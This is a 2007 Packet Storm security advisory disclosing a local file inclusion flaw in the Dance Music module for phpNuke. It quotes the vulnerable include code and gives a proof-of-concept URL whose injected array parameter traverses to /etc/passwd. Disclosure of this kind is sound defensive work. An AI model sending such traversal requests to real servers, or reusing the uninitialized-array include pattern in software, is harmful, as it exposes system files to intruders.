waraxe-2007-SA054.txt

2007-09-26T00:00:00
ID PACKETSTORM:59595
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2007-09-26T00:00:00

Description

                                        
                                            `  
[waraxe-2007-SA#054] - Local File Inclusion in Dance Music module for phpNuke  
============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 25. September 2007  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-54.html  
  
  
Target software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails  
&lid=251&title=Dance%20Music%20for%20PHP-Nuke  
  
Dance Music for PHP-Nuke  
by MultiMedia http://www.multimedia.com.ro  
and Nicolae Sfetcu http://www.sfetcu.com  
  
  
Vulnerabilities: Local File Inclusion in "index.php"  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Let's take a peek at source code of "index.php":  
  
------------>[source code]<------------  
  
include("header.php");  
...  
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';  
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';  
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';  
...  
$page = $_GET['page'];  
...  
$pagename = $ACCEPT_FILE[$page];  
if (!isSet($pagename)) $pagename = "index.html";  
include("modules/Dance_Music-MM/$pagename");  
  
------------>[/source code]<-----------  
  
As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there  
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"  
is active.  
  
Proof-of-concept test:  
  
http://victim.com/modules.php?name=Dance_Music-MM&page=1  
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd  
  
Warning: main() [function.main]: open_basedir restriction in effect.  
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd  
) is not within the allowed path(s): (/home/www/web32/)   
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154  
  
So local file inclusion exists, but safe mode can make exploiting harder.  
  
  
//-----> See ya soon and have a nice day ;) <-----//  
  
  
Greetings:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb  
and anyone else who know me!  
Greetings to Raido Kerna.  
Tervitusi Torufoorumi rahvale!  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Homepage: http://www.waraxe.us/  
  
  
Shameless advertise:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Free Service manuals - http://service-manuals.waraxe.us/  
User Manuals - http://user-manuals.waraxe.us/  
  
---------------------------------- [ EOF ] ----------------------------  
  
`